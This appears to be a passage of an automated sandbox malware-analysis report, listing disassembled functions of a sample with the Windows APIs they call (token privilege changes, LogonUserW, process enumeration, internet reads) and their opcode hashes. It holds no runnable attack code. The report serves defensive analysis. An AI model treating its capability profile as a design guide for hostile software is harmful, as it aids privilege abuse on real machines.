GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF80F6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
Instruction ID: 78bc59b8657843e2f7741b979573ff2b6f02acde900e9b2460318639d1e40ed7
Opcode Fuzzy Hash: f9a3932ee3b742868a0c5f48290fcee713b6f50792b86aef89c9daf342aa116c
Instruction Fuzzy Hash: BCF04F31240209AFEB204FA5EC8DE773BBCEF49755B400235FA45D7150CF659C42DA64

Function 00AA4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4AD0), ref: 00AA4B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AA4B57

Strings

GetNativeSystemInfo, xrefs: 00AA4B51
kernel32.dll, xrefs: 00AA4B40

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
Instruction ID: 21e11d51a93ee1d084ca4b3dc3e1b6bf6dd70ab8708976ff0573d6025fe8a43d
Opcode Fuzzy Hash: 317f758773bff1ccdabd149d9ae38a5a53cb630fb37be75f72991228568fc0f3
Instruction Fuzzy Hash: 2AD01234A10723CFD7209F31E858B56B6F4AF49751B11887DA485D71A0DBB0D480C664

Function 00AB3030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: db0241cf405bba162ce749ea15df21c677c29a0b206c033bdd50f453ae7bac13
Instruction ID: 1810dc66ca349cb658dcfde62bc3d9f40c59db2889e0686c2db299412bbe523a
Opcode Fuzzy Hash: db0241cf405bba162ce749ea15df21c677c29a0b206c033bdd50f453ae7bac13
Instruction Fuzzy Hash: B2229E726083409FDB24DF24C981BAFB7E8BF95350F14492DF49A97292DB71E904CB92

Function 00B1EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B1EE3D
Process32FirstW.KERNEL32(00000000,?), ref: 00B1EE4B

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Process32NextW.KERNEL32(00000000,?), ref: 00B1EF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B1EF1A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 69d80da6c83386d0b141f1b1507ea04eb1f40522b04eff7427664b755bcbadde
Instruction ID: 3ed61070a2f81196cc46d53db6161768d15f6bac5ec284648531971ba8a0708e
Opcode Fuzzy Hash: 69d80da6c83386d0b141f1b1507ea04eb1f40522b04eff7427664b755bcbadde
Instruction Fuzzy Hash: B45170715043019FD360EF24DC81EABB7E8EF99710F50492DF995972A1EB70E909CB92

Function 00AFE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AFE628

Strings

|, xrefs: 00AFE658
(, xrefs: 00AFE66E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: b9c4b6dd694ad5ad87cd07aef4decb7cffe9cf8e9d65eba145203a1405240ed6
Instruction ID: f5f7fcdf1562d9aeb5b69ef0e2fbb4e6640609fc42d29d11d27a4bbbd88fde58
Opcode Fuzzy Hash: b9c4b6dd694ad5ad87cd07aef4decb7cffe9cf8e9d65eba145203a1405240ed6
Instruction Fuzzy Hash: E4322575A007099FDB28DF59C481A6AB7F1FF48320B15C46EE99ADB3A1E770E941CB40

Function 00B122EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B1180A,00000000), ref: 00B123E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B12418

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 9b2366e2c50b428c6c58049b4c847c60eb3050d3fabef7e18b2050b22cfeff90
Instruction ID: 9791016d5aeedbdb909ddbd94470481e229ade8d463e3b66e78e2db776e84834
Opcode Fuzzy Hash: 9b2366e2c50b428c6c58049b4c847c60eb3050d3fabef7e18b2050b22cfeff90
Instruction Fuzzy Hash: E641C371A04209BFEB209F95EC85FFBB7FCEB40314F5040AEF611A7240EA759E919664

Function 00B0B3FB Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0B40B
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00B0B465
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00B0B4B2

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 272e5d325aab3e6aed36f0009631e75b4a4a398218a4b98b0b39d55b6d50b4ff
Instruction ID: ccd71041c166f39ebd044cd44ba1f04c748494dd5781b9f3a535f952806ccf8d
Opcode Fuzzy Hash: 272e5d325aab3e6aed36f0009631e75b4a4a398218a4b98b0b39d55b6d50b4ff
Instruction Fuzzy Hash: 8F216035A00108EFCB00EFA5D985EEEBBF8FF49310F1480A9E905AB391CB359916CB50

Function 00AF87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF8858
GetLastError.KERNEL32 ref: 00AF8865

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 700b4a9c92abd4de2005e51c17d33406c53923a78b2862eab61cf29679e7fee6
Instruction ID: 0017ba48a315357e0cd97cb3f02c3458a98406357c30b3aaa2f8767688e96e5e
Opcode Fuzzy Hash: 700b4a9c92abd4de2005e51c17d33406c53923a78b2862eab61cf29679e7fee6
Instruction Fuzzy Hash: 5B116DB2814209AFE728DFA4DC85D7BB7BCEB44750B20852EF45697241EA34AC418B60

Function 00AF874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00AF8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AF878B
FreeSid.ADVAPI32(?), ref: 00AF879B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
Instruction ID: 3e5a282819092c157882d17663d8703958e0233dda0936f6f8ba1872c608e457
Opcode Fuzzy Hash: 1d79b45340708588b3331c426fc4fdbb704c9644efea7fc584aed98232f5c315
Instruction Fuzzy Hash: 59F03775A1120DBBDB00DFE49D89ABEBBB8EF08201F1044A9AA01E2181EA756A048B50

Function 00B0C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B0C6FB
FindClose.KERNEL32(00000000), ref: 00B0C72B

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 76012b7c67e4f7ee36dea96526aa9579dceebbd8144539ee5fecea471745f47b
Instruction ID: 04d9b5828ae2cd78383590b2cada081001b17edba8c26761a7937048dabf84b2
Opcode Fuzzy Hash: 76012b7c67e4f7ee36dea96526aa9579dceebbd8144539ee5fecea471745f47b
Instruction Fuzzy Hash: DE11A1726002049FDB10DF29C885A2AFBE9FF89320F00861DF9A9D7290DB34AC01CF81

Function 00B0A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B19468,?,00B2FB84,?), ref: 00B0A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B19468,?,00B2FB84,?), ref: 00B0A0A9

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: be2d497672921de2dae14228fd5ecee004ef3b6b00e8e688e64e364a907db139
Instruction ID: 452a1e856a895cf908d71d852a5618eb18dd0fc8c46770ef843f7228cd35e309
Opcode Fuzzy Hash: be2d497672921de2dae14228fd5ecee004ef3b6b00e8e688e64e364a907db139
Instruction Fuzzy Hash: 18F0823550522DBBDB219FA4CC48FEA776CFF09761F0045A6F909D7181DB309940CBA1

Function 00AF81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8309), ref: 00AF81E0
CloseHandle.KERNEL32(?,?,00AF8309), ref: 00AF81F2

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 4e27d491afe9feca384b62617c48aa6fd34b7ed31b7a7fd1257a7bcf2171944c
Instruction ID: 378b72d7179dac6412dd3b8fad675520b24845a1b44deb7b5e5560dfe691604e
Opcode Fuzzy Hash: 4e27d491afe9feca384b62617c48aa6fd34b7ed31b7a7fd1257a7bcf2171944c
Instruction Fuzzy Hash: FDE0EC72011611EFE7252B60EC09E77BBFAEF04310B15893DF9A6C5470DB62AC91DB14

Function 00ACA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC8D57,?,?,?,00000001), ref: 00ACA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ACA163

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
Instruction ID: 4474e3e82796cc78bea31e764e68234c2189cff7cab07738f4d3066313ef9d62
Opcode Fuzzy Hash: 40910b223dd2323996a2f35af4248b36187bf9327b4e73c5f7ae04c109db0516
Instruction Fuzzy Hash: B7B0923105420AEBCA106B91EC09BA83F78EB44AA2F404030F60D86060CF6254528A99

Function 00ACF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
Instruction ID: 3a8da9c418eb90582db447b8c83edecc65569135ca64078c4dc8a556ff31a506
Opcode Fuzzy Hash: 25b503819cd5da2603d66ad609f812779cf1ef38989e1f587fc5d648657dfa16
Instruction Fuzzy Hash: 4C321561D69F454DDB239634C83233AA259AFB73C4F25D73BE829B69A5EF28C4834100

Function 00AD242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
Instruction ID: 26207125abc99d52ec015fe7b45c10e5782e53839c490eec49c26d08d8984bcc
Opcode Fuzzy Hash: d63bbfeef18364624017ae41fce2c7a2898e9ab76d40608df38f0173d3df5576
Instruction Fuzzy Hash: B6B1F321D2AF414DD3239639883133AB65CAFBB2C5F61D71BFC6775E62EB2185834241

Function 00B08889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00B0889B

Part of subcall function 00AC520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00B08F6E,00000000,?,?,?,?,00B0911F,00000000,?), ref: 00AC5213
Part of subcall function 00AC520A: __aulldiv.LIBCMT ref: 00AC5233

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: ec67399995dd6b4d5776811ab50175e30a4e4d8fa7a4685315f33573629f15d0
Instruction ID: ab97c4fbdfac36d0d449ab6571e3f80ba449389200a752128de20ad9178f6cd8
Opcode Fuzzy Hash: ec67399995dd6b4d5776811ab50175e30a4e4d8fa7a4685315f33573629f15d0
Instruction Fuzzy Hash: 8B21B4326356108BC729CF25D841A52B7E1EFA5311B688E6CD1F6CB2D0CE74B905CB94

Function 00B04C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00B04C4A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 16a42d53bcf9eab67bae6c2da93bf73f4305bf82483848cd68656406318e435c
Instruction ID: 859df47ce3b4c3c5f1fc807d2b43ae5a2b64f8504944126ccd8ff6e19c262fc3
Opcode Fuzzy Hash: 16a42d53bcf9eab67bae6c2da93bf73f4305bf82483848cd68656406318e435c
Instruction Fuzzy Hash: F5D05ED516920A38FC3C07209E0FF7A19C8F380782FD085C973018A0C1EE849C405030

Function 00AF87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AF8389), ref: 00AF87D1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
Instruction ID: 1a49a1affef8b40099f36160c720e83c957f38a4275a7c070a2c6635103a0ee2
Opcode Fuzzy Hash: bc7bfd651adc2666e6d617314b10724288dfe3552a03bf2ba49b75414d582741
Instruction Fuzzy Hash: 8FD05E3226050EABEF018EA4DD01EBF3B69EB04B01F408121FE15D60A1C775D835AB60

Function 00ACA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ACA12A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
Instruction ID: 378a82cade6a0532b3617b5a30313cdb83e2322770c2fb91f478cdb2c2821fe6
Opcode Fuzzy Hash: 780e662befd7809acdabf388aa2d7057a65fa59817722dee7dc90da89110370b
Instruction Fuzzy Hash: 91A0123000010DE78A001B41EC044547F6CD6001907004030F40C410218B3254114584

